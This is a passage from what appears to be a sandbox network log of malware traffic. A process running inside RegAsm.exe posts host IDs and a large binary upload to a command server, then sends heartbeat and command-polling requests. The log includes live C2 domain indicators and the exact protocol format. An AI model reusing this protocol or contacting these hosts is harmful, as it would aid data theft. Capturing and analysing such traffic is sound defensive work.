2024-05-06 05:53:26 UTC	822	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=slopg0viqmme05bnriuaadm4v0; expires=Thu, 29-Aug-2024 23:40:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FtlQ1TbjHfwStdCZumxm%2B6LlJRYK67qSM%2Fq88JDmdMn9XK7HznffGa45y3OX65aatv0JipCKb3jIxu6JHwR35Hm0if5%2Blbgwfeu%2FGvyHfwvSj8WQ41%2BBo0JzORiNGrT0KxYP1vRFk4YqaiqNwA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5bd6b447486-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:26 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49756	104.21.30.191	443	5064	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:27 UTC	293	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 585438 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:27 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:27 UTC	15331	OUT	Data Raw: e0 06 b0 f0 cc 21 90 78 85 08 04 d7 f8 d9 39 8a 6b 01 26 3d e9 ec 9c e3 40 67 3d f1 7f 75 f5 bf 97 5a e0 5e dc 02 66 31 20 ca 98 9a ed 83 70 5a 41 b0 83 69 50 6d 84 c6 7a c4 b2 72 8e 7a ee 40 71 77 53 1e ec 0c 87 2b c2 8d 2e b4 d2 20 e6 61 a9 1e 02 b8 12 9f 62 e7 82 01 e6 f2 cb c7 8c 03 22 76 a4 d9 15 0b c9 a9 c0 d4 1d db 85 1a 34 ef cd 2f 89 41 2b df 8c 58 42 1d 52 ee f6 5c 28 7c f8 53 ec 9b c5 09 15 de a4 46 0c b5 c2 4c 56 7d 10 96 e9 2e 44 72 2a de 54 61 11 26 ff 3c 66 8e 92 b4 55 e7 e3 24 cf a9 b1 17 e6 92 56 e4 2b ba ff 49 3d 43 3f 24 44 26 d1 5a 51 54 fe 0d a9 95 4e 3f 58 6f 47 ee 7f 41 06 58 d8 eb 17 b4 b6 d5 29 ac d8 a2 fc a9 4f 28 0b 69 20 23 ac f1 86 1b db 1e 8a 05 43 f6 27 6a ca 54 ae 35 1a a7 51 29 6e e8 37 3b d4 a1 fa be b7 c3 4d e9 bb e5 f2 Data Ascii: !x9k&=@g=uZ^f1 pZAiPmzrz@qwS+. ab"v4/A+XBR\(\|SFLV}.Dr*Ta&<fU$V+I=C?$D&ZQTN?XoGAX)O(i #C'jT5Q)n7;M
2024-05-06 05:53:27 UTC	15331	OUT	Data Raw: 87 16 1c 50 4c 23 08 b9 ba 32 72 d5 d4 16 d4 e7 98 72 ec eb f3 1f e7 db 02 aa b0 09 55 47 b1 b0 e1 b3 c8 16 09 ba d8 9f 7a 8d 57 4e 5d 2b 36 c6 58 43 e4 1c 8f ac 6b 67 7e bc 2b de ca 5a 12 86 2d 4f 98 f4 80 46 2d 24 e0 c7 20 18 be 11 fd af 1f e3 c5 8a 64 de f0 a3 b7 9a a4 25 c8 7c d3 27 6a c1 01 0f 91 23 8d ac 37 44 22 d1 92 7f 9a 64 a5 a9 9d 5d 3e 33 af 60 cb 80 e9 98 07 15 bd b6 54 3d a8 53 e4 26 3f b5 3a 40 78 c1 7a d1 78 42 91 df 48 87 5f 7d 8f 59 c8 54 ab 13 37 5e 84 96 bc 43 c0 c4 56 99 db 6e 71 b7 82 a0 3e 6c de 9a 21 72 b5 19 84 02 5e ed af 0f ea e1 01 ee d8 3e 82 7a 4b 09 3e cf be 14 78 64 df a1 34 6f a6 cd 58 3e 0f e6 e3 77 4b cb 69 c6 7c 36 b4 cd 27 1d 7b 1e b4 39 18 bc 74 fb 9b d1 e4 40 fb 3a a3 d8 72 7f c7 39 96 24 3a 98 c8 db 57 cb 78 cc d7 Data Ascii: PL#2rrUGzWN]+6XCkg~+Z-OF-$ d%\|'j#7D"d]>3`T=S&?:@xzxBH_}YT7^CVnq>l!r^>zK>xd4oX>wKi\|6'{9t@:r9$:Wx
2024-05-06 05:53:27 UTC	15331	OUT	Data Raw: 05 b0 e8 c6 5c 82 28 fa ed fe 62 6c 7c c8 de fd c5 af 65 b6 9f 90 b1 03 0a f1 f1 8a 63 f5 5f 68 de 20 b7 92 83 06 b2 ab c3 f9 7a b6 6f 25 41 87 71 16 d7 07 96 9b 02 7f b1 24 ff 6d 80 72 76 cc 59 00 38 30 9a 67 a2 12 18 31 2a 13 92 cb 8d df f0 66 ea 4e 7d b1 42 3c b4 c0 0c 0c 1f 3c 73 16 df 9c 78 4d 14 ec 51 d8 be ef e3 07 fc dd 36 43 0f ab 9b 93 02 dc e2 e3 0d 3d 94 20 20 68 b6 db 88 2d 83 34 d9 b3 d4 de 49 68 05 05 59 6c d3 5d f2 c3 ea db 68 66 76 c9 cc 73 28 ec 77 ab 7d 82 7e 0b be 1a 0e a2 c8 d7 6c ef 3f e5 fc dd 6e bf ff da 63 7d 54 a3 ca f3 28 e9 c4 34 03 27 18 e4 04 ec 13 2c 30 f4 54 16 ea 54 8c de 3a ae 2d 56 e2 d6 d7 ab 8c 08 0d 12 78 68 db b8 37 f7 92 66 43 b2 f2 cc 13 b9 47 bb c1 a9 ae 6c bb da 80 47 17 13 7d 5e 9a 1d 58 90 06 bd 0f 3d 4d 10 33 Data Ascii: \(bl\|ec_h zo%Aq$mrvY80g1*fN}B<<sxMQ6C= h-4IhYl]hfvs(w}~l?nc}T(4',0TT:-Vxh7fCGlG}^X=M3
2024-05-06 05:53:27 UTC	15331	OUT	Data Raw: 8f 2c f5 3b bb 95 b5 25 34 1a 46 2d 3f e2 e3 8e d1 5c 7c 8b cb 24 4d f7 7e 56 d3 c8 b1 60 fb 95 5e d3 19 79 47 c7 2b cb 8b 2f 7c db 56 d3 19 6d 0f ad ee f6 26 3f ff 68 f4 b3 9c 87 94 76 db 7c b1 fa 83 ba b5 37 73 ee 44 96 45 d5 04 ab f6 ee 2e 69 0a 0b be a5 3e 9c 93 b2 2e a5 f0 c1 5a e1 b9 2b 86 e9 f7 02 62 23 eb 42 c0 f7 70 e8 fd 2b eb 08 da f2 42 97 16 7e 56 76 fb 87 ed 2f 1d 74 34 86 67 f1 ad 62 71 4d 57 2d 19 8d b7 3c 75 a5 7e 7a 0f 97 29 46 27 7d 90 ba 7b f0 f1 11 76 91 3f ec 4c 68 ae 05 c2 47 18 14 c0 6f 18 a9 82 5e a9 f4 63 c6 ee c2 76 87 00 e4 75 40 5c e4 3b ad 76 08 0d e8 e2 5b a5 89 c9 84 2b 92 0f bd 61 00 15 6f 4e 24 56 e4 fa e5 a2 63 4a e4 70 01 8a d3 5c 81 bd 9d a8 59 39 9f fe c3 3e e2 1d 20 fe e5 8a bf fc 41 d5 41 d4 de dd 81 3d 43 42 9f 90 Data Ascii: ,;%4F-?\\|$M~V`^yG+/\|Vm&?hv\|7sDE.i>.Z+b#Bp+B~Vv/t4gbqMW-<u~z)F'}{v?LhGo^cvu@\;v[+aoN$VcJp\Y9> AA=CB
2024-05-06 05:53:27 UTC	15331	OUT	Data Raw: 54 b5 50 b8 d2 f9 0d a4 16 e3 9d 45 ba eb 43 e4 bd 96 ce 1b d2 af 5f ad b7 15 05 cd 2d bc 7a 15 58 8e 15 56 5e 30 fc ba 6d 04 41 ad 10 44 16 b4 e9 b0 10 cf 6e b9 ab 86 0c 1b 44 f3 6e 3a e3 be e6 89 39 0b b4 1a 57 eb b1 ce 92 f0 7b 48 ab 05 4a 47 bf f8 c2 70 90 23 ef bd 3e 41 ba 6a 34 7b 52 8f 7e 21 1f 37 64 7b f3 b9 ed ce 61 69 46 32 9a 76 37 f7 03 69 34 b4 a8 1a 6a 94 50 63 d8 ce 34 fa e9 e1 4f 75 75 16 3f 0b c8 c3 1f 95 86 45 79 fe 2b c9 6d 35 a8 21 a3 28 b0 c1 ef 0c 11 fc c3 17 27 72 eb 03 2e 72 10 51 ca 0b 7e 89 36 32 43 6b 62 9b 67 4c 3e c9 41 89 35 ba ad ec b3 f4 0c 42 cc 12 5a 99 75 b6 2b b5 6c eb 8a 6b 8d 77 4c 31 5e e3 31 5f 06 f1 15 3d 1e 72 94 0d 2a bf 70 42 a2 3f 40 18 f7 d6 2f 76 69 ab 26 8a f2 e2 7b 86 c7 16 7e 7e 7c 43 91 8e 9e 0f f1 6c 29 Data Ascii: TPEC_-zXV^0mADnDn:9W{HJGp#>Aj4{R~!7d{aiF2v7i4jPc4Ouu?Ey+m5!('r.rQ~62CkbgL>A5BZu+lkwL1^1_=r*pB?@/vi&{~~\|Cl)
2024-05-06 05:53:27 UTC	15331	OUT	Data Raw: 3d 26 cf 4c 16 b1 01 3c 53 34 41 16 00 d0 2a d8 c2 83 fc e3 38 6a 4b 35 e5 69 18 63 fc cf 6c 3e 3e 94 12 fb 46 fe f7 ae f8 2f 01 fb 00 05 e8 0b 2e 11 ae b1 d7 9c 04 d7 f1 1b 4a 2c b4 52 e8 9d 14 a1 cb ae ab 45 42 d4 b2 75 11 d4 e4 25 b2 b4 e8 ee a3 e7 ba 1b 02 7a c5 a6 e7 d2 f8 14 0f 40 f2 a3 27 d3 2b 98 58 c6 71 84 7a 02 6b 80 2f c9 00 04 e7 68 c1 c1 99 6b 36 b0 25 ba 71 49 bd bf d9 2b c2 e7 8a 18 29 95 da 62 58 62 b9 6c 09 a5 86 05 f6 92 b2 17 a8 25 a8 95 4a 57 e1 d5 bc 79 33 da 8b 90 b0 6e c1 6e 5c fb bd 60 fe d6 35 fb e6 b8 ef 36 49 9b 0e 50 aa d7 d2 0d 5e b5 c1 f4 61 83 7e 9c 5e d4 40 cc 33 d8 f1 45 04 6d 2b 65 e0 19 3a 50 6e e3 5a 34 3d 40 17 40 5b ab a5 e4 72 ef f7 55 9b b9 5b 5e bd 80 be e1 55 d5 02 d1 39 8a 74 36 8a 1e bf 39 f7 5e 09 e5 1f f0 71 Data Ascii: =&L<S4A*8jK5icl>>F/.J,REBu%z@'+Xqzk/hk6%qI+)bXbl%JWy3nn\`56IP^a~^@3Em+e:PnZ4=@@[rU[^U9t69^q
2024-05-06 05:53:27 UTC	15331	OUT	Data Raw: f6 fc f7 bc 43 90 69 5d 63 7c c4 43 ce af 3d 9e ba 37 c5 69 ef e7 43 05 28 65 af 3e dd 2e 2e 63 2f ff 47 16 de f4 40 da 6a 0c 37 94 d1 30 c1 68 82 fe 7b 5a 31 ce ad 89 74 78 3c 10 14 ca d3 d4 de 3c d0 bd bc 7e ec 1a 08 d9 38 01 2d 99 f9 9a cd 77 f3 74 4f 6e 12 f9 03 2b 9e f6 ef e5 6a c2 78 4e 19 ac cc 46 f2 7f 54 f5 7e 92 14 ab d9 71 e9 78 35 9f 8f f9 cd 06 8e 80 13 22 99 32 56 db 93 b5 fe 99 9f be e8 b9 65 82 13 4e bf 00 4e a2 87 e6 ee ee 59 1e ea 1a 90 2b 35 2d f9 34 38 5a 53 c1 8b f4 1f e2 f3 0e ec 62 b0 26 3a a5 aa f6 26 2b ee 07 bc 91 44 a8 70 1c af cb fb d9 a5 69 b0 57 c0 57 91 5d 9e 88 1a da 13 5c bd 3d 32 92 72 a1 5b 35 32 a2 62 21 ac 8c 21 a0 c7 f5 33 2e 32 5c 54 7a 63 27 36 9f d7 34 ab ed a5 f4 c4 8d b1 15 87 42 bb de 29 d6 ac e1 d7 1d 59 e8 9d Data Ascii: Ci]c\|C=7iC(e>..c/G@j70h{Z1tx<<~8-wtOn+jxNFT~qx5"2VeNNY+5-48ZSb&:&+DpiWW]\=2r[52b!!3.2\Tzc'64B)Y
2024-05-06 05:53:27 UTC	15331	OUT	Data Raw: 89 5c 99 a5 47 7a 02 b9 73 01 bc 0f 8b 5d 46 b0 ad b2 d3 3c bc 65 cc 7a 9e 11 7c bb 2e 98 5f bd 82 8b df bc a4 82 1b a5 2b ae 8e 85 be 5d c8 8e 2a 0b bd 7a 12 c7 5e df 16 75 31 9f 66 45 dd 06 8d f3 f0 89 28 ae 41 a1 25 e5 f3 e4 51 21 b9 8b 48 87 bc ba d4 6a 86 22 e6 a7 28 a9 d0 f4 70 93 13 d9 40 43 a1 c1 34 9e a8 33 06 ce 32 85 8f 5d 24 35 56 0c 3d bc 36 fa a3 06 bd 5a 57 76 03 3a 69 4e d0 17 5c cf 4b 6d 73 97 25 3b ee cd 0d e3 69 12 e0 60 8a 37 aa e8 12 19 43 d5 04 6d 0a 85 c5 fc b7 68 f8 94 54 c2 2b d5 d7 db 4a 07 24 08 16 66 19 53 a9 f7 78 32 8a d3 6e 81 12 d7 b3 6c da f6 85 84 d5 cf c9 d3 55 27 20 a9 f0 d7 7e f8 73 b0 9f d7 07 69 fa c8 53 ba 45 88 55 d3 62 66 74 be f9 76 c1 89 66 41 fd ed 2e a0 a3 bd d2 94 45 a3 cd c5 79 2b f9 25 3e 25 c7 84 55 d0 7c Data Ascii: \Gzs]F<ez\|._+]*z^u1fE(A%Q!Hj"(p@C432]$5V=6ZWv:iN\Kms%;i`7CmhT+J$fSx2nlU' ~siSEUbftvfA.Ey+%>%U\|
2024-05-06 05:53:27 UTC	15331	OUT	Data Raw: bd f9 9b 10 0b d7 8e e6 90 6a b3 96 80 5b ac 8f 67 57 72 c7 2a 26 5d 8a 2e cc b8 ba 56 6c 54 ae 06 9f df 7e 7b 7b 46 b1 e5 f8 d0 af 6f b3 9f 5b da 2b b7 72 ad 65 5a f6 b6 47 f9 69 ae d0 7a 52 d2 16 72 ad b7 97 5d 78 7e 97 8a ce 9e d6 19 d6 ca 67 b7 f5 ff 4a 4c 5d 78 43 5b 98 c8 99 7c 2d b0 27 75 f5 bc 6d bd 56 d6 26 89 7a 81 65 e8 6f f9 47 e4 71 e4 c8 9b 32 d7 37 2d fd 73 06 1d d4 ba fd b3 1b 57 fd 38 2f eb b7 d5 1c 82 ca 25 79 4a a7 de a0 bd 9f 08 cb 3d 50 bb 82 0d 2b 8f 34 f6 00 cd 35 0f 1f 12 fb 9c 96 13 49 04 62 3e 71 e2 2b db 6a dc d1 85 fd 35 28 cd 1d ae 0e 7d 84 60 77 86 31 8e cf a5 94 5a cf 69 96 cb a6 ce 9e a1 d9 63 29 5e f5 8f 37 e2 a2 d0 f3 82 b4 69 f4 4b de 37 25 2e 07 3c e6 21 e6 90 9d 45 71 de ce 22 c5 9a 67 b4 7a cf 59 2f 30 14 4b d5 dc 91 Data Ascii: j[gWr*&].VlT~{{Fo[+reZGizRr]x~gJL]xC[\|-'umV&zeoGq27-sW8/%yJ=P+45Ib>q+j5(}`w1Zic)^7iK7%.<!Eq"gzY/0K
2024-05-06 05:53:29 UTC	820	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5d5s6359vn7u4204ken1qe8j7p; expires=Thu, 29-Aug-2024 23:40:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fEC3frBJRjH40XHlqz900xafQbpYARrEcvECjN9%2FJfsAAu2lhXmQwLlpUQ6ecsmDW%2FJ58E%2FCNMYzWlfvsh33m9b8WRhccExcZXdTsAnn1a%2FByeDtlbgPu18nueuevO4KA9%2BTiZh54LI10psTGg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5c64d588dea-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49758	104.21.30.191	443	5544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:29 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:29 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-06 05:53:29 UTC	828	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gofrn7ndqreiq2vgt9u3amlqau; expires=Thu, 29-Aug-2024 23:40:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y45%2BDyCb51P%2B3UIifye1LLAqcGhyCLJhUHOAgjl8lZT9QddtjaZ6XQ6CShJA4GGzXPgWvj36W%2B1uNzli4LoRD9q%2FEz8D5dhZt%2FgBg%2FCqcvCl%2BxanjjKTuBcL%2FT8FIxh6R2GCiq%2BK00el5RPF7A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5cde9da7431-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:29 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-06 05:53:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49759	104.21.30.191	443	5856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:29 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:29 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-06 05:53:29 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ip0h6gm4puruubdnusj54gr4h0; expires=Thu, 29-Aug-2024 23:40:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2cmXimzYq%2BzlKryqPPrTt9orwxRCy1AykdiN4AMir70KtSvwBQ4F0e5bSknmbAuRXKeozJf6YeihjZNDiHjSu16w8ok8hNoegk9BJUJfZpR1GDk%2FyORkonX8DYJKTwdxUjgajjgoliq2mLHYcA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5ce6ae7a4f4-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:29 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-06 05:53:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49763	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:31 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:31 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-06 05:53:32 UTC	818	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=aej3sl9s5h6k92ec81rvuh5dj7; expires=Thu, 29-Aug-2024 23:40:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BgeUz77KVfyeHYbxwibI2z6%2BHytvjEqUf0HQs5G%2FSO0GNuVxx4BV2MDf58o2qtRki5EtoezHxZDL5kTXth669CF3XtfaPSOipwlMPhEWAV1e7pof4w%2FMY488LIJgaHA1x6tikKD5okqfw0yQ8A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5dfccc0da2b-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:32 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-06 05:53:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49764	104.21.30.191	443	5856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:32 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:32 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-05-06 05:53:32 UTC	822	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=683jvemegep4pl4h7l16pmekvm; expires=Thu, 29-Aug-2024 23:40:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CVqLwhgU2sFxmPdHOQoPc2J9ucbYXPTla2rv43CMZwyIxcMcUH1uXTwAexNGvhUNfovMKPtXWv3nV1it66G%2F0F5xuEhyyE7F4oUr4r%2FK%2BVW39H%2FlB0%2B5ZbX8B%2FS2JfahS0aH81Ah8mvaHp1sBw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5e249208deb-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:32 UTC	547	IN	Data Raw: 34 66 63 0d 0a 65 6a 45 44 43 55 2b 44 37 61 4f 63 45 30 39 4b 69 4b 6d 71 38 38 6c 4d 59 4a 69 39 32 46 65 34 4a 49 48 48 57 2f 78 35 2b 5a 63 42 4f 77 6f 72 4f 61 48 58 67 36 67 2f 52 55 4f 71 32 73 2f 52 38 32 77 55 36 73 69 39 65 37 49 74 6f 36 59 2f 33 6b 50 5a 38 52 74 64 63 47 78 6a 69 65 53 42 38 57 74 74 63 4b 6a 79 6f 50 71 79 52 6d 6d 52 6e 37 30 35 6d 68 36 68 35 53 79 5a 47 35 7a 76 44 6c 52 74 65 69 62 73 67 2b 50 78 64 6a 73 72 35 63 6a 5a 6d 4f 63 6c 44 37 71 52 30 6c 36 78 42 75 53 39 65 63 5a 5a 32 39 6f 66 52 57 4a 45 4c 76 43 47 67 62 41 5a 52 6b 4f 71 7a 4e 37 52 38 32 78 43 78 4a 2b 6f 4e 73 70 46 37 4c 51 48 33 6b 4f 43 79 31 68 59 64 32 77 39 34 70 6e 4b 38 33 30 38 46 71 71 54 6e 4d 50 35 66 46 43 6f 77 50 70 64 73 56 6d 4c 7a 67 Data Ascii: 4fcejEDCU+D7aOcE09KiKmq88lMYJi92Fe4JIHHW/x5+ZcBOworOaHXg6g/RUOq2s/R82wU6si9e7Ito6Y/3kPZ8RtdcGxjieSB8WttcKjyoPqyRmmRn705mh6h5SyZG5zvDlRteibsg+Pxdjsr5cjZmOclD7qR0l6xBuS9ecZZ29ofRWJELvCGgbAZRkOqzN7R82xCxJ+oNspF7LQH3kOCy1hYd2w94pnK8308FqqTnMP5fFCowPpdsVmLzg
2024-05-06 05:53:32 UTC	736	IN	Data Raw: 71 55 4c 6f 69 38 55 66 56 77 32 2f 49 55 45 7a 6b 70 62 65 65 42 77 50 4e 78 50 79 44 68 77 4d 32 44 6f 43 63 50 39 39 2b 33 50 39 56 46 34 36 49 7a 6c 42 53 52 38 52 56 65 5a 32 73 74 6f 63 47 70 6c 52 70 74 4c 2f 4b 4c 6b 4e 50 72 44 51 66 71 32 4c 59 6a 6d 48 79 6a 7a 56 4b 42 56 66 43 33 57 6a 73 4b 63 6b 57 4b 35 49 48 35 66 57 31 77 71 49 76 41 6c 4b 67 74 43 66 58 63 73 6a 37 49 52 76 47 6a 4e 4a 73 4a 6e 66 41 57 57 57 4a 35 4a 2b 2b 4a 77 76 64 36 4a 43 33 74 7a 34 6a 66 77 30 56 70 75 74 69 69 64 59 49 45 6f 34 51 30 6c 52 65 52 34 68 67 54 43 51 41 79 72 2b 65 71 35 78 6c 47 51 36 72 4d 78 4e 48 7a 62 45 4c 2b 33 72 34 30 33 6b 6a 74 6f 54 57 59 46 5a 62 36 48 6c 6c 68 62 43 66 70 68 38 44 7a 65 69 49 6f 37 38 62 4d 6c 36 63 76 42 37 71 52 30 Data Ascii: qULoi8UfVw2/IUEzkpbeeBwPNxPyDhwM2DoCcP99+3P9VF46IzlBSR8RVeZ2stocGplRptL/KLkNPrDQfq2LYjmHyjzVKBVfC3WjsKckWK5IH5fW1wqIvAlKgtCfXcsj7IRvGjNJsJnfAWWWJ5J++Jwvd6JC3tz4jfw0VputiidYIEo4Q0lReR4hgTCQAyr+eq5xlGQ6rMxNHzbEL+3r403kjtoTWYFZb6HllhbCfph8DzeiIo78bMl6cvB7qR0
